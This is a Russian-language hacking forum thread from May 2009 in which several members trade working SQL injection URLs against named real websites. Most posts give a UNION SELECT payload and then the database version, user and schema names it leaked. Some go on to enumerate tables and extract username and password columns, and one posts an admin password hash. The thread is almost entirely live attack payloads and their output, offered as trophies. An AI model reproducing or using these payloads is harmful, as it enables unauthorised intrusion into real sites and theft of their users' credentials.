SQL Инъекции

HAXTA4OK · 5 May 2009

http://sparvy.free.fr/cv/showcv.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--

5.0.67:SPARVY:[email protected]

короче при поиске таблиц кидает ошибку =\

------------------------------------------------------------------------
http://artistlikeourselves.com/alo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,versi on(),data base(),user()),28/*

4.0.27-standard-log:db195527007:[email protected]

------------------------------------------------------------------------
PR:7

попробуй прочитай

http://www.ktp.gr/am.php?id=1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4--

5.0.45-log:ktp_new:root@localhost

http://www.ktp.gr/am.php?id=1+union+select+1,2,concat_ws(0x3a,table_name,0x3a),4+from+information_schema.tables--

это жесть сайт, а скока таблов =\

_SEREGA_ · 5 May 2009

скуль:

Code:

http://www.thiederman.com/products_detail.php?id=-10+union+select+1,2,3,4,5,6--

версия:

Code:

http://www.thiederman.com/products_detail.php?id=-10+union+select+1,version(),3,4,5,6--

4.0.25 =(

infa:

Code:

http://www.thiederman.com/products_detail.php?id=-10+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6--

user() thieder@localhost
database() thieder

HAXTA4OK · 5 May 2009

http://www.tvsat.gr/static.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2--

5.0.77-community:tvsat_dorif:tvsat_root@localhost

PR: 2

_SEREGA_ · 5 May 2009

скуль:

Code:

http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,2,3,4,5--

версия:

Code:

http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,version(),3,4,5--

4.1.22

infa:

Code:

http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,concat_ws(0x3a,user(),database()),3,4,5--

user() videodem@localhost
database() netevents

HAXTA4OK · 5 May 2009

http://www.hcmr.gr/english_site/news/latest/hot_topics/show_hot.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),user ()),3,4,5,6,7,8--

5.0.33-log:hot_topicsublic@localhost

ТИЦ: 20
PR: 7

_SEREGA_ · 5 May 2009

скуль:
Code:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,2--
версия:
Code:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,version()--
5.0.27-standard

таблицы выводятся limit'om:
Code:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,table_name+from+information_schema.tables--
столбцы выводятся limit'om:
Code:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,column_name+from+information_schema.columns--
infa:
Code:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,concat_ws(0x3a,user(),database())--
user() [email protected]
database() slatsvideo2

udman · 5 May 2009

http://board.2mcl.com/board/mod/full.php?id=-1'+un ion+all+select+0,1,2,concat_ws(0x3a,ver sion(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Click to expand...

4.1.22:board2mclcom:board@localhost

DezMond™ · 6 May 2009

http://synlab.gatech.edu/project.php?id=-61+union+select+1,version(),3,4,5,6,7,8/*
5.0.45

winstrool · 6 May 2009

https://secure.vortec.com/store_products.php?catID=31&prodID=89+union+select+1,2,3,4,5,6,7,concat_ws(0x3b,version(),user(),database()),9,0,11,12,13,14,15,16,17,18,19,0,21,22+--

5.0.67-log;[email protected];vortec_db

_SEREGA_ · 6 May 2009

скуль:

Code:

http://www.exhalefitness.ca/index.php?id=-10+union+select+1,2,3,4,5,6--

версия:

Code:

http://www.exhalefitness.ca/index.php?id=-10+union+select+1,version(),3,4,5,6--

5.0.51-log

таблицы выводятся limit'om:

Code:

http://www.exhalefitness.ca/index.php?id=-10+union+select+1,table_name,3,4,5,6+from+information_schema.tables--

столбцы выводятся limit'om:

Code:

http://www.exhalefitness.ca/index.php?id=-10+union+select+1,column_name,3,4,5,6+from+information_schema.columns--

infa:

Code:

http://www.exhalefitness.ca/index.php?id=-10+union+select+1,concat_ws(0x3a,user()),3,4,5,6--

user() [email protected]

winstrool · 6 May 2009

_http://www.palaver.se/page.php?catid=-92+union+select+1,2,3,concat_ws(0x3b,version(),user(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,00,1

5.0.32-Debian_7etch10-log;[email protected];palaver_se

_http://www.dhool.com/sotd2/catlist.php?catid=21+union+select+unhex(hex(concat_ws(0x3b,version(),user(),database()))),2

4.1.14;dhooluser@localhost;dhooldb

_http://www.stranadetstva.ru/osnov.php?idraz=-3+union+select+1,concat_ws(0x3b,version(),user(),database())+--

5.0.33;us4320a@localhost;db4320a

admin:44f9e86198d1693e603ba7303b76a460
Click to expand...

_SEREGA_ · 6 May 2009

скуль:

Code:

http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,2,3,4,5,6,7,8--

версия:

Code:

http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,version(),3,4,5,6,7,8--

5.0.67-log

таблицы выводятся limit'om:

Code:

http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables--

столбцы выводятся limit'om:

Code:

http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns--

infa:

Code:

http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,concat_ws(0x3a,user(),database()),3,4,5,6,7,8--

user() [email protected]
database() upa

HAXTA4OK · 6 May 2009

http://www.touristicunion.gr/default.php?id=-1'+union+select+1,2,@@ver sion,4,5,6,7/*&lan g=en

5.0.45 дальше стена =\

PR: 4
------------------------------------------------------------------------
http://www.corfuhouse.gr/real_estate.php?lang=en&id=1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database (),u ser()),10,11,12,13,14,15,16,17,18--

4.0.26:corfuhouse_gr:corfuhou@localhost
------------------------------------------------------------------------
халява фм в греции

PR: 4

http://www.freefm.gr/new.php?id=-1+union+select+1,concat_ws(0x3a,versi on(),datab ase(),user()),3,4--

5.0.67-community:free98_fr98:free98_freefm@localhost

http://www.freefm.gr/new.php?id=-1+union+se lect+1,group_concat(table_name),3,4+from +information_schem a.tables+group+by+table_schema--

таблы:
links,sunday,downloads,monday,thursday,events,news,tuesday,friday,saturday,wednesday

erihtoney · 6 May 2009

Опять Грузия (

Code:

http://internet.ge/v2/index.php?action=catalogue&catid=4444444444444&start=1+union+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22+from+stat.users/*

HAXTA4OK · 6 May 2009

http://www.dipyl on.gr/main.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),us er()),3,4--

5.0.67-community:dipylon_main:dipylon_mainuser@localhost

http://www.dipylon.gr/main.php?id=-1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+group+by+table_schema--

Одна тока табла =\ :
d_partners

HAXTA4OK · 6 May 2009

PR: 3

http://www.cinematic.gr/link_en.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,ver sion(),datab ase(),user()),8,9--

4.1.22-standard-log:cinemati_admin:cinemati_admin1@localhost
------------------------------------------------------------------------
erihtoney said:
Опять Грузия (
Code:
http://internet.ge/v2/index.php?action=catalogue&catid=4444444444444&start=1+union+select+1,2,3,4,5,6,concat_ws(char(58),username,password),8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22+from+stat.users/*
Click to expand...
а где скуля ? =\ доработай скулю, или я просто туплю? =\

winstrool · 6 May 2009

_http://www.indmedica.com/specialities.php?catid=-16+union+select+1,version(),3,4,5+--

5.0.45;indmedica@localhost;indmedica

_http://www.kargah.com/names.php?catid=-5+union+select+1,2,concat_ws(0x3b,version(),user(),database()),4,5,6,7,8,9,0,1,12+--

4.1.22-standard;kargahc_kargah@localhost;kargahc_host002

RulleR · 6 May 2009

[PR 4]
Code:
http://www.emergentarchitecture.com/about_analogies.php?id=-42+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6-- 
5.0.67-log:twisco_emergentdb:[email protected]

erihtoney · 6 May 2009

Code:

http://www.utsg.net/publication.php?Year=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws(0x3a,version(),user(),database()),30

[info]
version:4.0.27-max-log
user:[email protected]
database:db127835715

[users]

HTML:

http://www.utsg.net/publication.php?Year=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(username,0x3a,password),30+from+users--

R1dex · 6 May 2009

Разработка, продвижение и обслуживание интернет-сайтов.
Code:
http://www.vikki-di.ru/show.php?id=-54+union+select+1,concat(table_name,0x3a,table_rows),3,4,5,6,7,8,9,0,11,12,13,14,15,16+from+information_schema.tables--

SQL Инъекции

HAXTA4OK Super Moderator
Staff Member

_SEREGA_ Banned

HAXTA4OK Super Moderator
Staff Member

_SEREGA_ Banned

HAXTA4OK Super Moderator
Staff Member

_SEREGA_ Banned

udman Elder - Старейшина

DezMond™ Elder - Старейшина

winstrool MasterBlind

_SEREGA_ Banned

winstrool MasterBlind

_SEREGA_ Banned

HAXTA4OK Super Moderator
Staff Member

erihtoney Member

HAXTA4OK Super Moderator
Staff Member

HAXTA4OK Super Moderator
Staff Member

winstrool MasterBlind

RulleR Elder - Старейшина

erihtoney Member

R1dex Elder - Старейшина

Useful Searches

SQL Инъекции

HAXTA4OK Super Moderator Staff Member

_SEREGA_ Banned

HAXTA4OK Super Moderator Staff Member

_SEREGA_ Banned

HAXTA4OK Super Moderator Staff Member

_SEREGA_ Banned

udman Elder - Старейшина

DezMond™ Elder - Старейшина

winstrool ~~*MasterBlind*~~

_SEREGA_ Banned

winstrool ~~*MasterBlind*~~

_SEREGA_ Banned

HAXTA4OK Super Moderator Staff Member

erihtoney Member

HAXTA4OK Super Moderator Staff Member

HAXTA4OK Super Moderator Staff Member

winstrool ~~*MasterBlind*~~

RulleR Elder - Старейшина

erihtoney Member

R1dex Elder - Старейшина

HAXTA4OK Super Moderator
Staff Member

HAXTA4OK Super Moderator
Staff Member

HAXTA4OK Super Moderator
Staff Member

winstrool MasterBlind

winstrool MasterBlind

HAXTA4OK Super Moderator
Staff Member

HAXTA4OK Super Moderator
Staff Member

HAXTA4OK Super Moderator
Staff Member

winstrool MasterBlind